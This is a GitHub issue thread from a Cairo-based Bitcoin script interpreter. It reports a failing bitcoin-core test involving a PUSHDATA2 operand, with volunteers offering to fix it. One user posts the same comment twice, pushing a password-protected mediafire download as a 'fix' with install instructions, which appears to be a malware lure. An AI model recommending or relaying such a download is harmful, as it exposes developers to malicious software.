### ISSUE TITLE
[bug] [bitcoin-core test] '0x4d 0x0100 0x08 8 EQUAL'

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#167]
### Issue

The following bitcoin-core test is failing to give the correct result :
```
ScriptSig: '0x4d 0x0100 0x08' -- ScriptPubKey: '8 EQUAL'
```

This code should be passing, but is giving an invalid script error. This might have to do with little-endian encoding of the `0x0100` not being interpreted properly.

### Replicate

To replicate the issue you can use the latest `main` branch with the following command:
```
scarb cairo-run '[[],64427082038777898854692793181038719032,16,[],15798080785170764,7]'
```

**Comment by adrianvrj** [comment]
hey, let me handle this one!

**Comment by ooochoche** [comment]
I can handle thud @b-j-roberts

**Comment by Kaminar-i** [comment]
please @b-j-roberts let me work on this

**Comment by martinvibes** [comment]
hey @b-j-roberts would love to take on this issue

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by b-j-roberts** [comment]
@adrianvrj any luck looking into this? Have you been able to identify where the bug is occuring?

**Comment by adrianvrj** [comment]
hi @b-j-roberts I did look into this but I haven't got into the solution, I will give a couple more tries and let you know if you should assign someone else
